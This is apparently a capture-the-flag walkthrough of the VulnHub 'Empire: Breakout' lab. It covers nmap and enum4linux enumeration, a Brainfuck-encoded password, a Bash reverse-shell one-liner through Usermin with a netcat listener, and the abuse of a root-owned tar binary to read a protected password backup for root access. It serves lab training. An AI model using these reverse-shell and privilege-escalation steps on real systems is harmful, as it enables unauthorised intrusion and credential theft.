Empire: BreakOut || VulnHub Complete Walkthrough

From my previous article, we have completed the first vulnerable box of the Empire series. 


Empire: LupinOne - VulnHub Complete Walkthrough



Empire: Breakout is an easy-difficulty vulnerable machine designed by icex64 and Empire Cybersecurity.



Setting Up

First, download the zip file from VulnHub.

Once the download completes, extract the archive and launch VirtualBox.

To create a new virtual machine, click on New.

Fill in the name, type, and version.

Click Next, choose the amount of memory, and then browse to the .vmdk file in the extracted directory.

Before starting the VM, check that the Network Adapter is set to Host-only Adapter, so that the vulnerable box is reachable only from your attacking machine.

Once the setup is done, start the VM.

When the instance is ready, it shows a console login prompt asking for a password.


Enumeration

Our first step is to find the target's IP address using netdiscover on the host-only interface.

┌─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:0b:b2:b7      1      42  PCS Systemtechnik GmbH                                                          
  192.168.56.115  08:00:27:31:e2:16      1      60  PCS Systemtechnik GmbH  

From the scan, we have discovered our target IP address, which is 192.168.56.115.

Now that we have the IP address, let's perform a port scan to detect which ports are open. This is an essential part of the enumeration process: it gives us a picture of the attack surface so that the following steps can be targeted. As in most cases, we are going to use the well-known Nmap tool.


Conducting Network Scans with Nmap

  • -p- : scan all 65535 TCP ports, not just the default top 1000
  • -A : enable OS detection, version detection, script scanning, and traceroute
  • -T4 : use the aggressive timing template (faster scan; fine on a local lab network)

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo nmap -p- -A -T 4 192.168.56.115
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-12 19:29 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.115
Host is up (0.0029s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
MAC Address: 08:00:27:31:E2:16 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/12%OT=80%CT=1%CU=31229%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=6207BDE7%P=x86_64-pc-linux-gnu)SEQ(SP=F8%GCD=1%ISR=F8%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-02-12T14:01:43
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   2.92 ms 192.168.56.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.86 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the Nmap output, we have spotted five open ports.

  • Port 80/TCP is running an HTTP service (Apache 2.4.51), which indicates that there might be a website.
  • Ports 139/TCP and 445/TCP are both running Samba (NetBIOS-SSN / SMB).
  • Ports 10000/TCP and 20000/TCP are both running HTTP services served by MiniServ, the web server used by Webmin.


Web Enumeration

Let's look at the contents ourselves: open a web browser of your choice and navigate to the target's IP address in the URL bar.

The page is just the default Apache2 Debian page. Nothing seems to be of interest here at first glance, so let's take a look at the other two HTTP ports.

Both show a Webmin login form. If we can obtain valid credentials, we can log in and use the application to get a foothold on the server.


Foothold

From the Nmap scan, we have spotted two open ports running the NetBIOS-SSN (Samba) service.

139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2

I have a separate write-up on this service, where I managed to compromise a server through SMB.

If you have not read that article, click here:

Exploiting SMB (Samba) - Port 139 and Port 445



Enumerating SMB (Samba) with enum4linux

Let's enumerate the SMB shares using enum4linux. It is basically a wrapper around the tools in the Samba package (smbclient, rpcclient, nmblookup) and makes it easy to quickly extract information about SMB from the target. Note that the target accepts a null session (username '' and password ''), which is what allows the RID cycling below to work without credentials.

┌─[mrdev@TS]─[~]
└──╼ $ enum4linux -a 192.168.56.115
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 12 19:53:03 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.56.115
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.56.115    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.56.115    |
 ============================================== 
Looking up status of 192.168.56.115
BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
BREAKOUT        <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.56.115    |
 ======================================= 
[+] Server 192.168.56.115 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.56.115    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.56.115    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.56.115 from smbclient: 
[+] Got OS info for 192.168.56.115 from srvinfo:
BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id     : 500
os version      : 6.1
server type     : 0x809a03

 =============================== 
|    Users on 192.168.56.115    |
 =============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 =========================================== 
|    Share Enumeration on 192.168.56.115    |
 =========================================== 

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.56.115
//192.168.56.115/print$ Mapping: DENIED, Listing: N/A
//192.168.56.115/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================== 
|    Password Policy Information for 192.168.56.115    |
 ====================================================== 


[+] Attaching to 192.168.56.115 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] BREAKOUT
[+] Builtin

[+] Password Info for Domain: BREAKOUT

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes 
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================ 
|    Groups on 192.168.56.115    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================= 
|    Users on 192.168.56.115 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
<more>
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
<more>
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
<more>
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
<more>

 =============================================== 
|    Getting printer info for 192.168.56.115    |
 =============================================== 
No printers returned.


enum4linux complete on Sat Feb 12 19:54:11 2022

┌─[mrdev@TS]─[~]
└──╼ $

From the output, we identified a local Unix user, cyber, which might be the username for the Webmin login. Now that we have a username, we only need the password.

If you take a look at the page source of the Apache2 Debian default page, you will find a hidden message in a comment.

The message is not encrypted; it is a program written in the Brainfuck esoteric language, and running it produces the text it encodes.


Decoding the Brainfuck Program

Open the browser and search for a Brainfuck decoder (interpreter). Paste the program into it and execute it.

On successful execution, the output is a password.
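For readers who would rather decode such a program offline than paste it into a third-party web site, here is a small Brainfuck interpreter. This is an added example and not part of the original walkthrough; the sample program at the bottom is constructed for the demo and is not the one found in the Breakout page source.

```python
"""Minimal Brainfuck interpreter, so a program found in a page's source can be decoded offline."""


def match_brackets(code: str) -> dict:
    """Map each '[' to its matching ']' and back; raise on unbalanced brackets."""
    stack, pairs = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at position {i}")
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at position {stack[-1]}")
    return pairs


def run_brainfuck(code: str, stdin: str = "", max_steps: int = 1_000_000) -> str:
    """Execute Brainfuck source and return everything it prints, decoded as Latin-1."""
    code = "".join(ch for ch in code if ch in "<>+-.,[]")  # everything else is a comment
    pairs = match_brackets(code)
    tape = bytearray(30000)  # classic 30,000 cells; values wrap at 8 bits
    inp = list(stdin.encode("latin-1"))
    out = bytearray()
    ptr = pc = steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= len(tape):
                raise IndexError("data pointer ran off the right end of the tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("data pointer ran off the left end of the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp.pop(0) if inp else 0  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = pairs[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = pairs[pc]  # jump back to the loop start
        pc += 1
    return out.decode("latin-1")


# Constructed sample (NOT the program from the Breakout page source): prints "Hi".
SAMPLE_PROGRAM = "++++++++[>+++++++++<-]>.>++++++++++[<+++>-]<+++."

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE_PROGRAM))
```

To decode the real program, copy it out of the HTML comment and pass it to run_brainfuck; the step limit guards against a malformed program looping forever.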


Establishing Reverse Shell Access Through Usermin Webmail Interface

Now that we have a valid username and password, let's try to log in to the web portal on port 20000.

Before Login
After Login

The login was successful and we are presented with the 'Usermin' application dashboard.

To get a command shell from the Usermin dashboard, go to Login >> Command Shell.

Next, run the ls command to list the files in the home directory. We find user.txt; read it with the cat command.

The Usermin command shell is limited, so let's create a Bash reverse shell (replace <LHOST> with your attacking machine's IP address, 192.168.56.1 in this lab):

bash -i >& /dev/tcp/<LHOST>/4242 0>&1

Before running this command, start a Netcat listener on your machine on the port you chose:

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4242
listening on [any] 4242 ...

On successful execution, the listener on port 4242 receives the reverse shell, which we then upgrade to an interactive TTY with Python's pty module:

┌─[mrdev@TS]─[~]
└──╼ $nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.115] 51532
bash: cannot set terminal process group (1615): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$ export TERM=xterm
export TERM=xterm
cyber@breakout:~$ 

Since this is not the root user, let’s identify further information about the target machine, which could be useful for gaining root access.


Privilege Escalation

Let's identify the rights, and privileges of the current user by executing the sudo -l command:

cyber@breakout:~$ sudo -l
bash: sudo: command not found

This error means that the sudo command-line utility is not installed on the target.


Directory Traversal and Password Extraction Privilege Escalation

As we have no rights, we cannot install it, so we have to find another way to escalate privileges locally. Let's start by listing the contents of the home directory, including hidden files:

cyber@breakout:~$ ls -al
ls -al
total 568
drwxr-xr-x  8 cyber cyber   4096 Feb 12 09:39 .
drwxr-xr-x  3 root  root    4096 Oct 19 08:24 ..
-rw-------  1 cyber cyber      0 Oct 20 07:52 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19 08:24 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19 08:24 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19 14:06 .filemin
drwx------  2 cyber cyber   4096 Oct 19 14:00 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19 14:29 .local
-rw-r--r--  1 cyber cyber    807 Oct 19 08:24 .profile
drwx------  2 cyber cyber   4096 Oct 19 13:59 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19 15:40 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20 07:52 .tmp
drwx------ 17 cyber cyber   4096 Feb 12 09:25 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19 14:31 user.txt
cyber@breakout:~$

Since the instance is running HTTP servers, there might be some clue in the file system, so let's take a look at the files and directories under /var. Notice that there is a backups directory, so let's look at its contents as well.

cyber@breakout:~$ ls /var
ls /var
backups  lib    lock  mail  run    tmp      webmin
cache    local  log   opt   spool  usermin  www
cyber@breakout:~$ ls -al /var/backups
ls -al /var/backups
total 28
drwxr-xr-x  2 root root  4096 Feb 12 09:21 .
drwxr-xr-x 14 root root  4096 Oct 19 13:48 ..
-rw-r--r--  1 root root 12732 Oct 19 15:56 apt.extended_states.0
-rw-------  1 root root    17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~$

The file .old_pass.bak is owned by root with mode 600, so we have no permission to read it as cyber.

If you look back at the listing of the home directory, you will have noticed a copy of the tar binary that is owned by root and is executable by any user.

-rwxr-xr-x  1 root  root  531928 Oct 19 15:40 tar

What is tar?

Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.


Let's use this tar binary to create an archive called backup.tar containing the protected file:

cyber@breakout:~$ ./tar -cf backup.tar /var/backups/.old_pass.bak
./tar -cf backup.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
backup.tar   tar  user.txt
cyber@breakout:~$

On successful execution, you will notice the archive in the current directory. Extract it and take a look at the file inside it. Note that tar strips the leading '/' from member names, so the extracted copy lands under ./var/backups and is owned by cyber, which is why it is now readable:

cyber@breakout:~$ tar -xf backup.tar
tar -xf backup.tar
cyber@breakout:~$ ls
ls
backup.tar  tar  user.txt  var
cyber@breakout:~$ cd var # Change the directories to .old_pass.bak
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls -al
ls -al
total 12
drwxr-xr-x 2 cyber cyber 4096 Feb 12 09:50 .
drwxr-xr-x 3 cyber cyber 4096 Feb 12 09:50 ..
-rw------- 1 cyber cyber   17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$

From the output, we have recovered a password. Let's try it for the root user with su:

cyber@breakout:~/var/backups$ su root
su root
Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups#

Finally, we have a root shell; verify it using the id command:

root@breakout:/home/cyber/var/backups#  id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups#

With root confirmed, simply change to the /root directory to obtain the root flag.

root@breakout:~# cd /root
cd /root
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
root@breakout:~# 

Congratulations on capturing both flags.
